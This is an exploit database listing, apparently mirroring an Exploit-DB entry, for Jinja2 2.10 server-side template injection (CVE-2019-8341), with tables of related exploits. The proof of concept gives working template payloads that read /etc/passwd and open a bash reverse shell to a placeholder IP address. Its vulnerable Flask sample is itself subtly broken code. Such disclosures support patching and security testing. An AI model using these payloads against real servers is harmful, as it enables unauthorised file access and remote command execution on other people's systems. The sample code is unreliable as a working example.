Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
"Jinja2 2.10 - 'from_string' Server Side Template Injection"
Author
JameelNabbo
Platform
python
Release date
2019-02-15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | ''' # Exploit Title: Jinja2 Command injection from_string function # Date: [date] # Exploit Author: JameelNabbo # Website: Ordina.nl # Vendor Homepage: http://jinja.pocoo.org # Software Link: https://pypi.org/project/Jinja2/#files # Version: 2.10 # Tested on: Kali Linux # CVE-2019-8341 // from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it. //here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}: ''' import Flask import request import Jinja2 @app.route("/") def index(): username = request.values.get('username') return Jinja2.from_string('Hello ' + username).render() if __name__ == "__main__": app.run(host='127.0.0.1' , port=4444) ''' POC //Exploiting the username param http://localhost:4444/?username={{4*4}} OUTPUT: Hello 16 Reading the /etc/passwd http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} Getting a reverse shell http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} How to prevent it: Never let the user provide template content. ''' |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-10-23 | "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" | webapps | python | "Ahmet Ümit BAYRAM" |
| 2020-10-16 | "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" | webapps | python | "Ünsal Furkan Harani" |
| 2020-08-04 | "Pi-hole 4.3.2 - Remote Code Execution (Authenticated)" | webapps | python | "Luis Vacacas" |
| 2019-12-24 | "Django < 3.0 < 2.2 < 1.11 - Account Hijack" | webapps | python | "Ryuji Tsutsui" |
| 2019-10-14 | "Ajenti 2.1.31 - Remote Code Execution" | webapps | python | "Jeremy Brown" |
| 2019-09-30 | "TheSystem 1.0 - Command Injection" | webapps | python | "Sadik Cetin" |
| 2019-09-30 | "thesystem 1.0 - Cross-Site Scripting" | webapps | python | "Anıl Baran Yelken" |
| 2019-04-03 | "PhreeBooks ERP 5.2.3 - Remote Command Execution" | remote | python | "Metin Yunus Kandemir" |
| 2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
| 2019-01-07 | "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" | remote | python | "Mehmet Ince" |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2019-06-04 | "IceWarp 10.4.4 - Local File Inclusion" | webapps | php | JameelNabbo |
| 2019-05-27 | "Deltek Maconomy 2.2.5 - Local File Inclusion" | webapps | multiple | JameelNabbo |
| 2019-05-23 | "Nagios XI 5.6.1 - SQL injection" | webapps | php | JameelNabbo |
| 2019-03-04 | "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" | webapps | hardware | JameelNabbo |
| 2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
| 2018-02-16 | "Twig < 2.4.4 - Server Side Template Injection" | webapps | php | JameelNabbo |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46386/?format=json')
For full documentation follow the link above